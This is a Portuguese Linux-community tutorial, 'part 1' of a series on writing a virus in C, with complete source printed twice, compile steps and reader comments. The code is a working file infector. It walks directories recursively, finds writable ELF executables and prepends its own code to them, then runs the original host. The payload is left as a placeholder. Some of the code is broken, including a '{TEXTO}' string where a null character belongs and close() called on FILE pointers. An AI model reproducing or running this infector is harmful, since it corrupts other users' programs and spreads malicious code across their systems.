Vírus de computador e criação de um vírus em C/C++ (parte 1 - básico)
Revirando meus materiais antigos encontrei um disquete, ainda funcionando, que continha um vírus criado no início de minha vida na informática. O código original estava em Pascal e foi criado para funcionar em DOS/Windows. Fiz algumas modificações, reescrevendo o código em C e adaptando seu funcionamento para Linux.
[ Hits: 164.963 ]
Por: Geraldo José Ferreira Chagas Júnior em 14/07/2008 | Blog: http://prginfo.blogspot.com
Mãos à obra
O fonte está publicado para download aqui.
Compilar com:
$ gcc virus1.c -o virus
O valor de "tamVir" irá variar de acordo com a ação escolhida. Compile o vírus, use o ls -l para verificar o tamanho do executável e modifique o valor de acordo com a tamanho encontrado. Compile novamente o vírus.
A execução do hospedeiro está retornando a seguinte mensagem: "Área de texto ocupada".
Deixei essa parte para quem quiser resolver, já que essa parte 1 é apenas para começar a ilustrar o funcionamento do vírus.
/*
virus1.c
Obs.: os tipos de arquivos podem ser
10. link simbólico lxxx
8. arquivo -xxx
6. arquivo de bloco bxxx
4. diretório dxxx
2. arquivo de caracter cxxx
1. arquivo de paginação pxxx
*/
#include <dirent.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#define WA(m) m&0x02
#define WG(m) m&0x10
#define WO(m) m&0x80
#define tamVir 12239 /* Tamanho do Vírus
Após o vírus ser compilado, use o ls -l para descobrir o tamanho do executável e use o tamanho aqui */
char codvirus [tamVir]; /* conterá o código do vírus */
const int CABEC_EXEC[]={127, 69, 76, 70, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2, 0, 3, 0, 1, 0, 0, 0}; /* Cabeçalho de um binário executável */
int _USER_;
int _GROUP_;
char *_PATH_;
void infecta (char *_arq, struct stat _attr)
{
/*Essa técnica de infecção foi uma tentativa que deu certo, foi feita gravando byte por byte, pois assim diminui em muito o tamanho do código, porém pode ser aperfeiçoado.
No Windows seria fácil, bastaria copiar o vírus para um arquivo temporário e depois copiar a arquivo a ser infectado no final do temporário, apagar o arquivo original e depois renomear o temp.
No Linux o buraco é "mais embaixo". Apesar de ter direito de escrita em um arquivo, o usuário pode não ter direito de escrita no diretório onde o arquivo se encontra. Logo não daria para criar o temporário.
Então, pode vir a pergunta. Por que não copia o arquivo para um temporário em um diretório qualquer, sobrescreve o vírus no futuro hospedeiro e inclui o temporário no final? O problema é que teria que varrer todo o disco procurando um diretório em que o usuário tivesse direito de escrita correndo o risco de não encontrar nenhum. Nem o próprio diretório do usuário home me dá garantia que posso escrever nele ou se o usuário que irá executar o vírus tem diretório home. Por que, então não guardar o executável na memória, sobrescrever o vírus no arquivo e incluir o conteúdo da memória no final?
Porque nada garante que dependendo do tamanho do executável e da memória disponível irá ter espaço suficiente, principalmente se estiverem sendo executados várias instâncias do vírus ao mesmo tempo. Como não temos problema de tempo, pois o vírus ficará na memória indefinidamente, essa solução me pareceu melhor.*/
FILE *file_exec;
FILE *file_tmp;
char buf[1024];
char *tmp;
long i;
if (!(file_exec=fopen(_arq, "rw+"))) return;
tmp=(char *)malloc(strlen (_arq)+4);
strcpy (tmp, _arq);
strcat (tmp,".tmp");
if (file_tmp=fopen(tmp, "w+"))
{
unlink(tmp);
/* Copiando o hospedeiro para o temporário */
while (i=fread(buf,1,1024,file_exec)) fwrite(buf,1,i,file_tmp);
/* Voltando ao início dos arquivos */
fseek(file_tmp,0 ,SEEK_SET);
fseek(file_exec,0 ,SEEK_SET);
/* copiando para dentro do arquivo original, poupamos tempo com permissões.
Gravando o código do vírus no arquivo temporário*/
fwrite(codvirus,1,tamVir,file_exec);
/* voltando o original para depois do vírus */
while (i=fread(buf,1,1024,file_tmp)) fwrite(buf,1,i,file_exec);
}
free(tmp);
close (file_tmp);
close (file_exec);
}
void tentaInfectar (char *arq)
{
FILE *file_exec;
long ret;
char bout[25];
int i;
/* vamos pegar os atributos do arquivo */
struct stat attrib;
stat(arq, &attrib);
/* verificando se o arquivo é binário
Todo executável binário assim como no Windows tem um cabeçalho identificando.
Não sei o significado mas abri vários binários e sem exceção eles têm os seguintes primeiros.
24 byts = CABEC_EXEC */
if (!(file_exec=fopen(arq,"r"))) return; /* se não temos direito de leitura, não serve */
ret = fread (bout, 1, 24, file_exec);
/*Tem menos de 24 bytes, nem precisa testar, não é executável binário*/
if (ret <= 0)
{
close (file_exec);
return;
}
for (i=0; i<=23; i++)
{
/* Se tiver alguma diferença no cabeçalho, não é binário */
if (CABEC_EXEC[i] != bout[i])
{
close (file_exec);
return;
}
}
/* Se o usuário for root ou for igual ao dono do arquivo no caso do grupo, tem que ter direito de escrita outro caso é se o arquivo der direito de escrita para todos nestes 4 casos, podemos continuar */
if ((_USER_ != 0) && (!(WA(attrib.st_mode))) && ((_USER_!=attrib.st_uid) || (!(WO(attrib.st_mode)))) && ((_GROUP_!=attrib.st_gid) || (!(WG(attrib.st_mode))))) return;
infecta (arq, attrib);
}
void buscaInfecta (char *d)
{
struct dirent *dir;
DIR *path;
char *strArq;
char *dt;
int tam;
tam = strlen(d);
dt=(char *)malloc (tam+1);
strcpy (dt, d);
/* retirando a barra do fim do nome em caso de diretório para ficar padrão quando for diretório a barra será recolocada*/
if (dt[tam-1]=='/')
{
dt[tam-1]='{TEXTO}';
tam--;
}
if (!(path=opendir (dt))) { free (dt); return; }
while(dir = readdir(path))
{
usleep (1000);
strArq=(char *)malloc(tam + strlen (dir->d_name) + 2);
strcpy (strArq, dt);
strcpy (&strArq[tam], "/");
strcpy (&strArq[tam+1], dir->d_name);
if ((dir->d_type==4) && (strcmp (dir->d_name,".")!=0) && (strcmp (dir->d_name,"..")!=0))
buscaInfecta (strArq);
else if (dir->d_type==8)
tentaInfectar (strArq);
free (strArq);
}
closedir (path);
free (dt);
}
void pegaDadosExport (void)
{
/* Pegando a Variável PATH do sistema */
_PATH_ = getenv("PATH");
/* pegando id do usuário e do grupo do usuário que está executando a aplicação */
_USER_ = getuid();
_GROUP_= getgid();
}
int pegaCodVirus (char *exec)
{
/* há 2 possibilidades. Ou foi digitado todo o caminho do arquivo ou o diretório do arquivo está no path */
FILE *file_exec;
char *diret;
char *tmp;
int i=0, j=0;
int tamstr;
int achou=0;
long ret;
/* caso não tenha digitado todo o path do arquivo */
if (!(file_exec=fopen(exec,"r")))
{
tamstr=strlen(exec);
/* Busca no PATH do sistema*/
while (1)
{
if ((_PATH_[i]==':') || (_PATH_[i]=='{TEXTO}'))
{
tmp=&_PATH_[j];
diret=(char *)malloc(i-j+tamstr+2);
strncpy (diret, tmp, i-j);
diret[i-j]='{TEXTO}';
strcat (diret, "/");
strcat (diret, exec);
if (file_exec=fopen(diret,"r"))
{
free (diret);
achou = 1;
break;
}
free (diret);
if (_PATH_[i]=='{TEXTO}') break;
j=++i;
}
else i++;
}
if (!(achou)) return 0;
}
ret = fread (codvirus, 1, tamVir, file_exec);
if (ret <= 0) /* Não conseguiu copiar todo o código do vírus*/
{
close (file_exec);
return 0;
}
close (file_exec);
return 1;
}
void executaHospedeiro (char *exec, int qtde, char *param[])
{
/* há 2 possibilidades. Ou foi digitado todo o caminho do arquivo ou o diretório do arquivo está no path */
FILE *file_exec;
FILE *file_tmp;
char *diret;
char *tmp;
char tmpstr[1024];
int i=0, j=0;
int tamstr;
int achou=0;
long ret;
char prog[512];
/* caso não tenha digitado todo o path do arquivo */
if (!(file_exec=fopen(param[0],"r")))
{
tamstr=strlen(param[0]);
/* Busca no PATH do sistema*/
while (1)
{
if ((_PATH_[i]==':') || (_PATH_[i]=='{TEXTO}'))
{
tmp=&_PATH_[j];
diret=(char *)malloc(i-j+tamstr+2);
strncpy (diret, tmp, i-j);
diret[i-j]='{TEXTO}';
strcat (diret, "/");
strcat (diret, param[0]);
if (file_exec=fopen(diret,"r"))
{
free (diret);
achou = 1;
break;
}
free (diret);
if (_PATH_[i]=='{TEXTO}') break;
j=++i;
}
else i++;
}
if (!(achou)) return;
}
strcpy (prog,exec);
for (ret=1; ret<qtde; ret++)
{
strcat (prog," ");
strcat (prog,param[ret]);
}
if (!(file_tmp=fopen(exec,"w+")))
{
close (file_tmp);
return;
}
fseek(file_exec,tamVir,SEEK_SET);
while (ret = fread (tmpstr, 1, 1024, file_exec)) fwrite (tmpstr, ret, 1, file_tmp);
close (file_exec);
close (file_tmp);
chmod (exec,493);
system (prog);
unlink(prog);
return;
}
int main (int argc, char *argv[])
{
int i;
i=fork();
if (i==0)
{
pegaDadosExport ();
/* pega o código binário do vírus para infectar os outros ou então pula a infecção */
if (pegaCodVirus (argv[0])) buscaInfecta ("./");
acao;
}
else executaHospedeiro ("./arqexec", argc, argv);
}
virus1.c
Obs.: os tipos de arquivos podem ser
10. link simbólico lxxx
8. arquivo -xxx
6. arquivo de bloco bxxx
4. diretório dxxx
2. arquivo de caracter cxxx
1. arquivo de paginação pxxx
*/
#include <dirent.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#define WA(m) m&0x02
#define WG(m) m&0x10
#define WO(m) m&0x80
#define tamVir 12239 /* Tamanho do Vírus
Após o vírus ser compilado, use o ls -l para descobrir o tamanho do executável e use o tamanho aqui */
char codvirus [tamVir]; /* conterá o código do vírus */
const int CABEC_EXEC[]={127, 69, 76, 70, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2, 0, 3, 0, 1, 0, 0, 0}; /* Cabeçalho de um binário executável */
int _USER_;
int _GROUP_;
char *_PATH_;
void infecta (char *_arq, struct stat _attr)
{
/*Essa técnica de infecção foi uma tentativa que deu certo, foi feita gravando byte por byte, pois assim diminui em muito o tamanho do código, porém pode ser aperfeiçoado.
No Windows seria fácil, bastaria copiar o vírus para um arquivo temporário e depois copiar a arquivo a ser infectado no final do temporário, apagar o arquivo original e depois renomear o temp.
No Linux o buraco é "mais embaixo". Apesar de ter direito de escrita em um arquivo, o usuário pode não ter direito de escrita no diretório onde o arquivo se encontra. Logo não daria para criar o temporário.
Então, pode vir a pergunta. Por que não copia o arquivo para um temporário em um diretório qualquer, sobrescreve o vírus no futuro hospedeiro e inclui o temporário no final? O problema é que teria que varrer todo o disco procurando um diretório em que o usuário tivesse direito de escrita correndo o risco de não encontrar nenhum. Nem o próprio diretório do usuário home me dá garantia que posso escrever nele ou se o usuário que irá executar o vírus tem diretório home. Por que, então não guardar o executável na memória, sobrescrever o vírus no arquivo e incluir o conteúdo da memória no final?
Porque nada garante que dependendo do tamanho do executável e da memória disponível irá ter espaço suficiente, principalmente se estiverem sendo executados várias instâncias do vírus ao mesmo tempo. Como não temos problema de tempo, pois o vírus ficará na memória indefinidamente, essa solução me pareceu melhor.*/
FILE *file_exec;
FILE *file_tmp;
char buf[1024];
char *tmp;
long i;
if (!(file_exec=fopen(_arq, "rw+"))) return;
tmp=(char *)malloc(strlen (_arq)+4);
strcpy (tmp, _arq);
strcat (tmp,".tmp");
if (file_tmp=fopen(tmp, "w+"))
{
unlink(tmp);
/* Copiando o hospedeiro para o temporário */
while (i=fread(buf,1,1024,file_exec)) fwrite(buf,1,i,file_tmp);
/* Voltando ao início dos arquivos */
fseek(file_tmp,0 ,SEEK_SET);
fseek(file_exec,0 ,SEEK_SET);
/* copiando para dentro do arquivo original, poupamos tempo com permissões.
Gravando o código do vírus no arquivo temporário*/
fwrite(codvirus,1,tamVir,file_exec);
/* voltando o original para depois do vírus */
while (i=fread(buf,1,1024,file_tmp)) fwrite(buf,1,i,file_exec);
}
free(tmp);
close (file_tmp);
close (file_exec);
}
void tentaInfectar (char *arq)
{
FILE *file_exec;
long ret;
char bout[25];
int i;
/* vamos pegar os atributos do arquivo */
struct stat attrib;
stat(arq, &attrib);
/* verificando se o arquivo é binário
Todo executável binário assim como no Windows tem um cabeçalho identificando.
Não sei o significado mas abri vários binários e sem exceção eles têm os seguintes primeiros.
24 byts = CABEC_EXEC */
if (!(file_exec=fopen(arq,"r"))) return; /* se não temos direito de leitura, não serve */
ret = fread (bout, 1, 24, file_exec);
/*Tem menos de 24 bytes, nem precisa testar, não é executável binário*/
if (ret <= 0)
{
close (file_exec);
return;
}
for (i=0; i<=23; i++)
{
/* Se tiver alguma diferença no cabeçalho, não é binário */
if (CABEC_EXEC[i] != bout[i])
{
close (file_exec);
return;
}
}
/* Se o usuário for root ou for igual ao dono do arquivo no caso do grupo, tem que ter direito de escrita outro caso é se o arquivo der direito de escrita para todos nestes 4 casos, podemos continuar */
if ((_USER_ != 0) && (!(WA(attrib.st_mode))) && ((_USER_!=attrib.st_uid) || (!(WO(attrib.st_mode)))) && ((_GROUP_!=attrib.st_gid) || (!(WG(attrib.st_mode))))) return;
infecta (arq, attrib);
}
void buscaInfecta (char *d)
{
struct dirent *dir;
DIR *path;
char *strArq;
char *dt;
int tam;
tam = strlen(d);
dt=(char *)malloc (tam+1);
strcpy (dt, d);
/* retirando a barra do fim do nome em caso de diretório para ficar padrão quando for diretório a barra será recolocada*/
if (dt[tam-1]=='/')
{
dt[tam-1]='{TEXTO}';
tam--;
}
if (!(path=opendir (dt))) { free (dt); return; }
while(dir = readdir(path))
{
usleep (1000);
strArq=(char *)malloc(tam + strlen (dir->d_name) + 2);
strcpy (strArq, dt);
strcpy (&strArq[tam], "/");
strcpy (&strArq[tam+1], dir->d_name);
if ((dir->d_type==4) && (strcmp (dir->d_name,".")!=0) && (strcmp (dir->d_name,"..")!=0))
buscaInfecta (strArq);
else if (dir->d_type==8)
tentaInfectar (strArq);
free (strArq);
}
closedir (path);
free (dt);
}
void pegaDadosExport (void)
{
/* Pegando a Variável PATH do sistema */
_PATH_ = getenv("PATH");
/* pegando id do usuário e do grupo do usuário que está executando a aplicação */
_USER_ = getuid();
_GROUP_= getgid();
}
int pegaCodVirus (char *exec)
{
/* há 2 possibilidades. Ou foi digitado todo o caminho do arquivo ou o diretório do arquivo está no path */
FILE *file_exec;
char *diret;
char *tmp;
int i=0, j=0;
int tamstr;
int achou=0;
long ret;
/* caso não tenha digitado todo o path do arquivo */
if (!(file_exec=fopen(exec,"r")))
{
tamstr=strlen(exec);
/* Busca no PATH do sistema*/
while (1)
{
if ((_PATH_[i]==':') || (_PATH_[i]=='{TEXTO}'))
{
tmp=&_PATH_[j];
diret=(char *)malloc(i-j+tamstr+2);
strncpy (diret, tmp, i-j);
diret[i-j]='{TEXTO}';
strcat (diret, "/");
strcat (diret, exec);
if (file_exec=fopen(diret,"r"))
{
free (diret);
achou = 1;
break;
}
free (diret);
if (_PATH_[i]=='{TEXTO}') break;
j=++i;
}
else i++;
}
if (!(achou)) return 0;
}
ret = fread (codvirus, 1, tamVir, file_exec);
if (ret <= 0) /* Não conseguiu copiar todo o código do vírus*/
{
close (file_exec);
return 0;
}
close (file_exec);
return 1;
}
void executaHospedeiro (char *exec, int qtde, char *param[])
{
/* há 2 possibilidades. Ou foi digitado todo o caminho do arquivo ou o diretório do arquivo está no path */
FILE *file_exec;
FILE *file_tmp;
char *diret;
char *tmp;
char tmpstr[1024];
int i=0, j=0;
int tamstr;
int achou=0;
long ret;
char prog[512];
/* caso não tenha digitado todo o path do arquivo */
if (!(file_exec=fopen(param[0],"r")))
{
tamstr=strlen(param[0]);
/* Busca no PATH do sistema*/
while (1)
{
if ((_PATH_[i]==':') || (_PATH_[i]=='{TEXTO}'))
{
tmp=&_PATH_[j];
diret=(char *)malloc(i-j+tamstr+2);
strncpy (diret, tmp, i-j);
diret[i-j]='{TEXTO}';
strcat (diret, "/");
strcat (diret, param[0]);
if (file_exec=fopen(diret,"r"))
{
free (diret);
achou = 1;
break;
}
free (diret);
if (_PATH_[i]=='{TEXTO}') break;
j=++i;
}
else i++;
}
if (!(achou)) return;
}
strcpy (prog,exec);
for (ret=1; ret<qtde; ret++)
{
strcat (prog," ");
strcat (prog,param[ret]);
}
if (!(file_tmp=fopen(exec,"w+")))
{
close (file_tmp);
return;
}
fseek(file_exec,tamVir,SEEK_SET);
while (ret = fread (tmpstr, 1, 1024, file_exec)) fwrite (tmpstr, ret, 1, file_tmp);
close (file_exec);
close (file_tmp);
chmod (exec,493);
system (prog);
unlink(prog);
return;
}
int main (int argc, char *argv[])
{
int i;
i=fork();
if (i==0)
{
pegaDadosExport ();
/* pega o código binário do vírus para infectar os outros ou então pula a infecção */
if (pegaCodVirus (argv[0])) buscaInfecta ("./");
acao;
}
else executaHospedeiro ("./arqexec", argc, argv);
}
Compilar com:
$ gcc virus1.c -o virus
O valor de "tamVir" irá variar de acordo com a ação escolhida. Compile o vírus, use o ls -l para verificar o tamanho do executável e modifique o valor de acordo com a tamanho encontrado. Compile novamente o vírus.
A execução do hospedeiro está retornando a seguinte mensagem: "Área de texto ocupada".
Deixei essa parte para quem quiser resolver, já que essa parte 1 é apenas para começar a ilustrar o funcionamento do vírus.
Páginas do artigo
1. Motivação2. Introdução
3. Ação do vírus
4. Teorizando
5. Mãos à obra
Outros artigos deste autor
Inicialização e interrupção do sistema (Debian)
Linvox - Sistema Linux voltado para deficientes visuais
Montando um ambiente utilizando Tomcat + Java + MySQL (Debian)
X Window, Controladores de Janelas e Ambientes Desktop
Instalando e configurando o aMule (Debian)
Leitura recomendada
Introdução à linguagem C - Parte II
Estudo de ponteiros para GNU/Linux
Criando uma aplicação gráfica com o Qt Designer
Comentários
[1] Comentário enviado por iz@bel em 14/07/2008 - 12:43h
Bom! Acho que vou instalar o Clamav °_°
rsrsrsrsrs
Parabéns pelo Artigo!!!
Muito didático...
[]'s
Bom! Acho que vou instalar o Clamav °_°
rsrsrsrsrs
Parabéns pelo Artigo!!!
Muito didático...
[]'s
[2] Comentário enviado por dailson em 14/07/2008 - 14:13h
Parabéns pelo artigo.
Didaticamente excelente!
Parabéns pelo artigo.
Didaticamente excelente!
[3] Comentário enviado por elgio em 14/07/2008 - 14:15h
Gostei do Artigo, com a parte da descrição de vírus e até lembrando o saudoso DIR-II...
Convém, porém, destacar que os exemplos apresentados neste artigo estão mais para negação de serviço local do que para vírus.
DoS pode (e DEVE!!) ser facilmente eviitada com politicas de quotas, sejam em disco ou seja de recursos via PAM LIMITS (http://www.vivaolinux.com.br/artigos/verArtigo.php?codigo=7070 e http://gravatai.ulbra.tche.br/~elgio/tchelinux2008/ - palestra Negação de serviço).
Se me permite, vi que usaste de forma equívoca a chamada pipe. Ela precisa sempre de um vetor de int de duas posições para funcionar. Teus códigos não sofrem com isto porque na verdade tu não usas o pipe, foi apenas um artifício para matar a saída padrão. O mesmo poderia ter sido feito com:
close(1);
close(2); // saida de erro!
fopen("/dev/null", "w");
dup(1);
Vai abrir o arquivo fake /dev/null que irá ocupar o descritor 1 (que fora fechado) o dup irá duplicar o 1 no 2 (pq tb foi fechado). Saida padrão e saida padrão de erro são agora /dev/null.
[]'s
Gostei do Artigo, com a parte da descrição de vírus e até lembrando o saudoso DIR-II...
Convém, porém, destacar que os exemplos apresentados neste artigo estão mais para negação de serviço local do que para vírus.
DoS pode (e DEVE!!) ser facilmente eviitada com politicas de quotas, sejam em disco ou seja de recursos via PAM LIMITS (http://www.vivaolinux.com.br/artigos/verArtigo.php?codigo=7070 e http://gravatai.ulbra.tche.br/~elgio/tchelinux2008/ - palestra Negação de serviço).
Se me permite, vi que usaste de forma equívoca a chamada pipe. Ela precisa sempre de um vetor de int de duas posições para funcionar. Teus códigos não sofrem com isto porque na verdade tu não usas o pipe, foi apenas um artifício para matar a saída padrão. O mesmo poderia ter sido feito com:
close(1);
close(2); // saida de erro!
fopen("/dev/null", "w");
dup(1);
Vai abrir o arquivo fake /dev/null que irá ocupar o descritor 1 (que fora fechado) o dup irá duplicar o 1 no 2 (pq tb foi fechado). Saida padrão e saida padrão de erro são agora /dev/null.
[]'s
[4] Comentário enviado por Ragen em 14/07/2008 - 17:00h
As instruções do Elgio estão corretas. Todavia, a didática e a qualidade do seu artigo estão de parabéns.
Há tempos não via um artigo tão interessante no VOL sobre a temática de programação.
Abraços
Ragen Dazs
As instruções do Elgio estão corretas. Todavia, a didática e a qualidade do seu artigo estão de parabéns.
Há tempos não via um artigo tão interessante no VOL sobre a temática de programação.
Abraços
Ragen Dazs
[5] Comentário enviado por albfneto em 14/07/2008 - 18:14h
Muito bom, didático e a ideía é muito original!
Muito bom, didático e a ideía é muito original!
[6] Comentário enviado por gjr_rj em 14/07/2008 - 18:49h
elgio, discordo quando você diz que "exemplos apresentados neste artigo estão mais para negação de serviço local do que para vírus", pois um vírus não se define por sua ação, eu procurei fazer algo que não acarretasse em problemas para a máquina, mas a funcionalidade fica por conta de quem resolver implementá-lo. Porém não aconselho a implementar os exemplos como vírus, as próximas partes do artigo evoluirá o código e esses sim ficaram mais perto do real. A idéia dessa primeira parte é só dar o "pontapé inicial".
Concordo com relação ao pipe. De início tinha usado o vetor com 2 posições, mas resolvi retirar uma, pois queria apenas não mostrar a saída, mas realmente, como queria usar esses códigos como exemplos, deveria ter feito da forma correta.
Legal a utilização do /dev/null. Não conhecia essa possibilidade.
Ainda não tive tempo de ler os link que você passou, mas vou fazer isso.
Obrigado pelo comentário.
elgio, discordo quando você diz que "exemplos apresentados neste artigo estão mais para negação de serviço local do que para vírus", pois um vírus não se define por sua ação, eu procurei fazer algo que não acarretasse em problemas para a máquina, mas a funcionalidade fica por conta de quem resolver implementá-lo. Porém não aconselho a implementar os exemplos como vírus, as próximas partes do artigo evoluirá o código e esses sim ficaram mais perto do real. A idéia dessa primeira parte é só dar o "pontapé inicial".
Concordo com relação ao pipe. De início tinha usado o vetor com 2 posições, mas resolvi retirar uma, pois queria apenas não mostrar a saída, mas realmente, como queria usar esses códigos como exemplos, deveria ter feito da forma correta.
Legal a utilização do /dev/null. Não conhecia essa possibilidade.
Ainda não tive tempo de ler os link que você passou, mas vou fazer isso.
Obrigado pelo comentário.
[7] Comentário enviado por Teixeira em 14/07/2008 - 19:22h
O autor procurou demonstrar as linhas de raciocínio a serem seguidas por quem desejar (por qualquer motivo) produzir um virus.
Lembro-me de algumas versões do famoso Stoned, muito pequeno, e que se multiplicavam sequencialmente pelo HD afora, como arquivo oculto, dificultando a sua localização e que, decorrido algum tempo da infecção, iam deixando o computador cada vez mais lento.
Era um virus aparentemente despretencioso, porém muito eficaz.
As primeiras versões eram detectáveis, porque eram apendidas a um arquivo executável, cujo tamanho ia crescendo de forma visível.
Com o tempo, passaram a usar o atributo -h e o usuário só iria perceber muito tempo depois, quando a coisa toda travava.
O Michelangelo tinha duas versões principais: Uma delas simplesmente apagava o HD sem maiores satisfações em uma data convencionada (se não me engano era 6 de março).
A outra versão ainda brindava o incauto usuário com uma belíssima tela daquele artista - e detonava o HD do mesmo jeito.
Fica pois demonstrado que é possível produzir virus para o ambiente Linux, apesar das dificuldades.
O autor procurou demonstrar as linhas de raciocínio a serem seguidas por quem desejar (por qualquer motivo) produzir um virus.
Lembro-me de algumas versões do famoso Stoned, muito pequeno, e que se multiplicavam sequencialmente pelo HD afora, como arquivo oculto, dificultando a sua localização e que, decorrido algum tempo da infecção, iam deixando o computador cada vez mais lento.
Era um virus aparentemente despretencioso, porém muito eficaz.
As primeiras versões eram detectáveis, porque eram apendidas a um arquivo executável, cujo tamanho ia crescendo de forma visível.
Com o tempo, passaram a usar o atributo -h e o usuário só iria perceber muito tempo depois, quando a coisa toda travava.
O Michelangelo tinha duas versões principais: Uma delas simplesmente apagava o HD sem maiores satisfações em uma data convencionada (se não me engano era 6 de março).
A outra versão ainda brindava o incauto usuário com uma belíssima tela daquele artista - e detonava o HD do mesmo jeito.
Fica pois demonstrado que é possível produzir virus para o ambiente Linux, apesar das dificuldades.
[8] Comentário enviado por removido em 14/07/2008 - 22:29h
Bom,artigo,isso que eu chamo de criatividade.
Bom,artigo,isso que eu chamo de criatividade.
[9] Comentário enviado por f_Candido em 14/07/2008 - 22:54h
Muito Massa. Parabéns.
Além de ser uma excelente maneira de aprender a programar e entender o sistema.
Abraços
Muito Massa. Parabéns.
Além de ser uma excelente maneira de aprender a programar e entender o sistema.
Abraços
[10] Comentário enviado por extreme z3r0 em 15/07/2008 - 09:49h
Parabens. excelente artigo... vou até criar um aqui para ver como que é ^^
Parabens. excelente artigo... vou até criar um aqui para ver como que é ^^
[11] Comentário enviado por stremer em 15/07/2008 - 15:54h
artigo muito bom!
Em relação a discussão sobre os exemplos não serem virus...realmente não são... são malware... e como foi falado no artigo todo tipo de malware hoje é dito como virus... e geralmente um virus vem com algum malware embutido... acredito que tenhamos mais sobre virus como forma de infecção e tudo mais nos próximos artigos.
Porém vale lembrar que virus (se levarmos ao pé da letra) esta em extinção... hoje os chamados virus geralmente são malware, muitas vezes trojans que tentam roubar informação da maquina do usuário ou worms....
artigo muito bom!
Em relação a discussão sobre os exemplos não serem virus...realmente não são... são malware... e como foi falado no artigo todo tipo de malware hoje é dito como virus... e geralmente um virus vem com algum malware embutido... acredito que tenhamos mais sobre virus como forma de infecção e tudo mais nos próximos artigos.
Porém vale lembrar que virus (se levarmos ao pé da letra) esta em extinção... hoje os chamados virus geralmente são malware, muitas vezes trojans que tentam roubar informação da maquina do usuário ou worms....
[12] Comentário enviado por engos em 15/07/2008 - 16:34h
Gostei muito do artigo!
Devido ultimamente o VOL estar colocando muitos artigos repetidos e já abordados por outros, parei de escrever alguns que estava fazendo de tanto ver o pessoal fazendo os artigos sem nada a acrescentar, fico muito contente que você tenha feito um realmente novo e criativo ao invés das coisas já exaustivamente repetidas, conseguiu ser melhor que qualquer outro que já li por aqui!
Tirando todo o bla bla bla já comentado sobre vírus, código etc, você planeja fazer a parte 2? Se sim, seria algo alem do basico?
Parabéns pelo artigo.
Gostei muito do artigo!
Devido ultimamente o VOL estar colocando muitos artigos repetidos e já abordados por outros, parei de escrever alguns que estava fazendo de tanto ver o pessoal fazendo os artigos sem nada a acrescentar, fico muito contente que você tenha feito um realmente novo e criativo ao invés das coisas já exaustivamente repetidas, conseguiu ser melhor que qualquer outro que já li por aqui!
Tirando todo o bla bla bla já comentado sobre vírus, código etc, você planeja fazer a parte 2? Se sim, seria algo alem do basico?
Parabéns pelo artigo.
[13] Comentário enviado por gjr_rj em 15/07/2008 - 16:45h
No artigo não é dito que os exemplos são vírus. Os exemplos mostram "funcionalidades" que podem ser usadas no vírus. Resolvi usar exemplo que não prejudicassem a máquina e que fossem interessantes. Poderia usar um "apaga tudo", mas além de ser prejudicial, trata-se de um código pobre.
O vírus não é o exemplo, mas sim o código final usando a rotina acao dos exemplos.
No artigo não é dito que os exemplos são vírus. Os exemplos mostram "funcionalidades" que podem ser usadas no vírus. Resolvi usar exemplo que não prejudicassem a máquina e que fossem interessantes. Poderia usar um "apaga tudo", mas além de ser prejudicial, trata-se de um código pobre.
O vírus não é o exemplo, mas sim o código final usando a rotina acao dos exemplos.
[14] Comentário enviado por gjr_rj em 15/07/2008 - 16:52h
engos. sim, pretendo fazer a parte II e III desse artigo, já está definido o que será abordados e a parte II já começou a ser criada. A idéia é chegar em algo bem próximo a um vírus para windows. Ajustando a data/hora do arquivo, faze a infecção e execução sem precisar de arquivo temporário, não se auto infectar etc. O problema é a falta de tempo.
Na realidade, começou como mencionei apenas mostrando meu primeiro vírus, mas acabei gostando e resolvi evoluir até o último vírus criado por mim.
Posso adiantar que é 1000 x mais complicado criar o vírus para o Linux o que tem deixado o código muito legal.
engos. sim, pretendo fazer a parte II e III desse artigo, já está definido o que será abordados e a parte II já começou a ser criada. A idéia é chegar em algo bem próximo a um vírus para windows. Ajustando a data/hora do arquivo, faze a infecção e execução sem precisar de arquivo temporário, não se auto infectar etc. O problema é a falta de tempo.
Na realidade, começou como mencionei apenas mostrando meu primeiro vírus, mas acabei gostando e resolvi evoluir até o último vírus criado por mim.
Posso adiantar que é 1000 x mais complicado criar o vírus para o Linux o que tem deixado o código muito legal.
[15] Comentário enviado por maran em 16/07/2008 - 08:50h
Grande Geraldo, cara demais em meu, fiquei viajando qui tentando entender o que fez, haja imaginação e conhecimento, mesmo sem saber nada vou ficar ancioso para ler os próximos,
um grande abraço.
Grande Geraldo, cara demais em meu, fiquei viajando qui tentando entender o que fez, haja imaginação e conhecimento, mesmo sem saber nada vou ficar ancioso para ler os próximos,
um grande abraço.
[16] Comentário enviado por gjr_rj em 16/07/2008 - 11:08h
Foi mal maran !!!
Vou rever a forma de escrever o código e os comentários nos próximos artigos. A idéia não era fzer você viajar !
Revendo o artigo vi que realmente poderia ter explicado melhor o código.
vlw
Foi mal maran !!!
Vou rever a forma de escrever o código e os comentários nos próximos artigos. A idéia não era fzer você viajar !
Revendo o artigo vi que realmente poderia ter explicado melhor o código.
vlw
[17] Comentário enviado por maran em 16/07/2008 - 11:10h
Não foi uma critica a seu artigo e sim um elogio meu velho, não sei se vc me entendeu mal, disse que viajei não pela explicação, mas sim por não entender programação, mas esta muito bom seu artigo ;)
Aguardo ancioso os próximos ;P
Abraços
Não foi uma critica a seu artigo e sim um elogio meu velho, não sei se vc me entendeu mal, disse que viajei não pela explicação, mas sim por não entender programação, mas esta muito bom seu artigo ;)
Aguardo ancioso os próximos ;P
Abraços
[18] Comentário enviado por gjr_rj em 16/07/2008 - 11:36h
maran,
tinha entendido +-.
Entendi que tinha gostado do artigo. Mas não percebi que não conhece programação. Para dizer a verdade isso "nem passou pela minha cabeça". É que as vezes nos esquecemos que pessoas como você são normais.
Quer dizer que você não sabe tudo ?
rsrsrsrs
Bricadeiras a parte, vlw pelo comentário !
maran,
tinha entendido +-.
Entendi que tinha gostado do artigo. Mas não percebi que não conhece programação. Para dizer a verdade isso "nem passou pela minha cabeça". É que as vezes nos esquecemos que pessoas como você são normais.
Quer dizer que você não sabe tudo ?
rsrsrsrs
Bricadeiras a parte, vlw pelo comentário !
[19] Comentário enviado por maran em 16/07/2008 - 13:24h
asuhhusahashuhusa
Estou ainda em estruturas de dados e ainda sou normal, husahusahu to longe de sabe tudo hsuahusahusa
